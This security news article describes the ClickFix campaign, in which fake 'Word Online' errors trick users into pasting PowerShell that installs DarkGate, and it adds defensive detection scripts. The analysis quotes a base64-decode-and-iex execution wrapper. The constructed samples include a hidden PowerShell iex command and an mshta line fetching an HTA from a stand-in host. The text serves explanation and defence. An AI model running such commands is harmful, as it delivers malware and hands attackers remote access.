New ClickFix ‘Word Online’ Message Tricks Users into Installing DarkGate Malware

A social engineering campaign dubbed “ClickFix” has emerged, targeting users with fake “Word Online” error messages to distribute the DarkGate malware.

Unlike a drive-by download, this attack relies on manipulating users into executing a malicious command themselves, exploiting their trust in familiar troubleshooting steps.

The campaign specifically mimics a missing browser extension error, urging victims to click a “How to fix” button to resolve the supposed issue.

The attack begins when a user visits a compromised or malicious webpage displaying the fake notification.

The prompt instructs the victim to open a PowerShell terminal and paste a “fix” command. Unbeknownst to the user, clicking the “How to fix” button triggers a JavaScript function that copies a malicious PowerShell script directly to their clipboard.

Because the browser never downloads or runs anything itself, download scanning and drive-by exploit protections see nothing: the user carries the command across the trust boundary by pasting it into a shell.

Point Wild analysts identified this campaign and noted that the reliance on user interaction, rather than on a file the browser fetches and executes, lets it evade many automated detection systems.

Once the victim pastes and executes the command, the PowerShell script retrieves a malicious HTA file from a remote server.

Indicates a problem with the installed browser extension (Source – Point Wild)

This file serves as a staging ground for the final payload, establishing persistence and preparing the system for the deployment of DarkGate, a remote access trojan capable of full system compromise.

Technical Analysis of the Infection Chain

The technical execution of this attack involves multiple layers of obfuscation.

Base64-encoded data is embedded within the HTML structure (Source – Point Wild)

The initial webpage embeds base64-encoded content that is stored reversed; a small reverse function restores it before decoding, which hides the command from a casual look at the page source (see the figure above).
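To make the two tricks described above concrete (the click handler that fills the clipboard, and the reversed base64 that hides the command in the page source), here is an added example of a static triage routine for an HTML page. It is not code from the Point Wild report or from the campaign page; the sample page, the stand-in command, the indicator list and the function names are constructed for illustration, and it runs under Node.js.

```javascript
// Added example, not code from the Point Wild report or the campaign page:
// static triage of an HTML page for the ClickFix pattern. It flags click
// handlers that write to the clipboard, decodes base64 strings that are
// stored reversed (the obfuscation described above), and scores the
// result for PowerShell download-and-execute indicators.

// Clipboard sinks a "How to fix" button would call.
const CLIPBOARD_SINKS = [
  /navigator\.clipboard\.writeText\s*\(/,
  /execCommand\s*\(\s*['"]copy['"]\s*\)/,
];

// Indicators checked in script text and in anything we manage to decode.
const PS_INDICATORS = [
  ['powershell', /\bpowershell\b/i],
  ['hidden window', /-w(?:indowstyle)?\s+hidden/i],
  ['iex', /\biex\b|Invoke-Expression/i],
  ['base64 decode', /FromBase64String/i],
  ['hta stage', /\bmshta\b|\.hta\b/i],
  ['download', /DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b/i],
];

// Returns the decoded text if `s` is valid, printable base64 either as
// written or after reversing it; otherwise null.
function decodeMaybeReversed(s) {
  for (const candidate of [s, s.split('').reverse().join('')]) {
    if (!/^[A-Za-z0-9+\/]+={0,2}$/.test(candidate)) continue;
    const buf = Buffer.from(candidate, 'base64');
    // Round-trip check rejects strings that only look like base64.
    if (buf.toString('base64') !== candidate) continue;
    const text = buf.toString('utf8');
    if (/[^\t\n\r\x20-\x7e]/.test(text)) continue; // binary junk, not a command
    return text;
  }
  return null;
}

function triagePage(html) {
  const js = [...html.matchAll(/<script\b[^>]*>([\s\S]*?)<\/script>/gi)]
    .map(m => m[1]).join('\n');
  const clipboardSink = CLIPBOARD_SINKS.some(re => re.test(js));
  // split('').reverse().join('') feeding atob() is the reverse-function trick.
  const reverseThenDecode = /\.reverse\(\)\s*\.join\(/.test(js) && /\batob\s*\(/.test(js);
  const decoded = [];
  for (const m of js.matchAll(/["']([A-Za-z0-9+\/=]{40,})["']/g)) {
    const text = decodeMaybeReversed(m[1]);
    if (text !== null) decoded.push(text);
  }
  const corpus = [js, ...decoded].join('\n');
  const indicators = PS_INDICATORS.filter(([, re]) => re.test(corpus)).map(([n]) => n);
  // A clipboard write alone is normal (copy-link buttons); pair it with command indicators.
  const suspect = clipboardSink && indicators.length >= 2;
  return { clipboardSink, reverseThenDecode, decoded, indicators, suspect };
}

// Constructed sample: a stand-in "fix" command, stored as reversed base64 in
// the page the way the article describes. Not the campaign's real payload.
const SAMPLE_CMD = 'powershell -w hidden -c "ipconfig /flushdns; iex ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($s)))"';
const REVERSED_B64 = Buffer.from(SAMPLE_CMD, 'utf8').toString('base64').split('').reverse().join('');
const SAMPLE_HTML = `
<div class="alert">Word Online: the browser extension is missing or damaged.</div>
<button id="fix">How to fix</button>
<script>
  var p = "${REVERSED_B64}";
  document.getElementById("fix").onclick = function () {
    var cmd = atob(p.split("").reverse().join(""));
    navigator.clipboard.writeText(cmd); // user is then told to paste this into PowerShell
  };
</script>`;

console.log(JSON.stringify(triagePage(SAMPLE_HTML), null, 2));
```

The verdict deliberately requires both a clipboard sink and at least two command indicators, since copy-to-clipboard buttons are common on legitimate pages; the decoded command text, not just the presence of base64, is what should drive a block or an analyst review.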

An AutoIt script (Source – Point Wild)

When decoded, the payload is a PowerShell command that flushes the DNS cache and downloads the next stage. The wrapper shown below base64-decodes that command and runs it in memory with Invoke-Expression (iex):

# Decode the embedded base64 string and execute the resulting script text in memory
iex([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64)));

This command fetches dark.hta from a compromised domain. Upon execution, the HTA file creates a directory on the C: drive and drops an AutoIt interpreter executable together with a compiled AutoIt script named fckhffh.a3x.

Invoking the DES algorithm (Source – Point Wild)

The compiled script uses the DES algorithm to decrypt the final DarkGate payload. The malware then establishes communication with its command-and-control servers, completing the compromise and granting the attackers remote access to the victim machine.
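The chain above (pasted PowerShell, HTA download, AutoIt interpreter running a .a3x script) is a good fit for correlation on process-creation telemetry. The following is an added example of such a correlator, not code from the Point Wild report. The events are constructed, Sysmon-Event-1-style records; the field names, the assumption that the HTA is launched through mshta.exe, the AutoIt3.exe file name, the example.invalid host and the C:\temp directory are all illustrative assumptions, and the sample runs under Node.js.

```javascript
// Added example, not code from the Point Wild report: correlates the three
// stages described above in process-creation telemetry. Field names, the
// mshta.exe launcher, the AutoIt3.exe name and the directory are assumptions.

const STAGES = [
  {
    // Stage 1: the pasted ClickFix command. Parent is the shell the user
    // typed into (explorer.exe for Win+R, or Windows Terminal), and the
    // command line base64-decodes something and hands it to iex.
    name: 'clickfix-powershell',
    match: e => /\\(powershell|pwsh)\.exe$/i.test(e.image)
      && /\\(explorer|windowsterminal)\.exe$/i.test(e.parentImage)
      && /\biex\b|Invoke-Expression/i.test(e.commandLine)
      && /FromBase64String/i.test(e.commandLine),
  },
  {
    // Stage 2: the HTA fetched by that script; assumed to run via mshta.exe.
    name: 'hta-dropper',
    match: e => /\\mshta\.exe$/i.test(e.image) && /\.hta\b/i.test(e.commandLine),
  },
  {
    // Stage 3: AutoIt interpreter executing a compiled .a3x script.
    name: 'autoit-loader',
    match: e => /\\autoit3\.exe$/i.test(e.image) && /\.a3x\b/i.test(e.commandLine),
  },
];

// Returns the stage name an event matches, or null for anything else.
function classify(e) {
  const s = STAGES.find(st => st.match(e));
  return s ? s.name : null;
}

// Groups stage hits per host and raises one alert per host when the
// pasted-PowerShell stage is followed by at least one later stage inside
// `windowMs`. A lone mshta or AutoIt launch never alerts on its own.
function correlate(events, windowMs = 10 * 60 * 1000) {
  const byHost = new Map();
  for (const e of events) {
    const stage = classify(e);
    if (!stage) continue;
    if (!byHost.has(e.host)) byHost.set(e.host, []);
    byHost.get(e.host).push({ t: Date.parse(e.utcTime), stage, pid: e.processId });
  }
  const alerts = [];
  for (const [host, hits] of byHost) {
    hits.sort((a, b) => a.t - b.t);
    const first = hits.find(h => h.stage === 'clickfix-powershell');
    if (!first) continue;
    const stages = [first.stage];
    for (const h of hits) {
      if (h.t > first.t && h.t - first.t <= windowMs && !stages.includes(h.stage)) stages.push(h.stage);
    }
    if (stages.length >= 2) alerts.push({ host, firstSeen: new Date(first.t).toISOString(), stages });
  }
  return alerts;
}

// Constructed telemetry; these are not real events from the campaign.
const SAMPLE_EVENTS = [
  { host: 'WS-01', utcTime: '2025-01-15T10:00:05Z', processId: 4120,
    image: 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
    parentImage: 'C:\\Windows\\explorer.exe',
    commandLine: 'powershell -w hidden -c "ipconfig /flushdns; iex([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b)))"' },
  { host: 'WS-01', utcTime: '2025-01-15T10:00:09Z', processId: 4188,
    image: 'C:\\Windows\\System32\\mshta.exe',
    parentImage: 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
    commandLine: 'mshta.exe http://example.invalid/dark.hta' },
  { host: 'WS-01', utcTime: '2025-01-15T10:00:14Z', processId: 4210,
    image: 'C:\\temp\\AutoIt3.exe', // directory name is made up for the sample
    parentImage: 'C:\\Windows\\System32\\mshta.exe',
    commandLine: 'C:\\temp\\AutoIt3.exe C:\\temp\\fckhffh.a3x' },
  // Benign: a scheduled maintenance script; wrong parent, no iex/base64.
  { host: 'WS-02', utcTime: '2025-01-15T10:01:00Z', processId: 3001,
    image: 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
    parentImage: 'C:\\Windows\\System32\\svchost.exe',
    commandLine: 'powershell -NoProfile -File C:\\scripts\\cleanup.ps1' },
  // Lone HTA launch on another host: no pasted-PowerShell stage, so no alert.
  { host: 'WS-03', utcTime: '2025-01-15T10:02:00Z', processId: 5000,
    image: 'C:\\Windows\\System32\\mshta.exe',
    parentImage: 'C:\\Windows\\explorer.exe',
    commandLine: 'mshta.exe C:\\Users\\alice\\Desktop\\report.hta' },
];

console.log(JSON.stringify(correlate(SAMPLE_EVENTS), null, 2));
```

Anchoring the alert on the first stage matters: base64-decoding PowerShell spawned directly from the user's shell is rare in most fleets, while mshta and AutoIt each have legitimate uses, so requiring the paste step plus a follow-on stage keeps the rule specific to ClickFix-style delivery.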
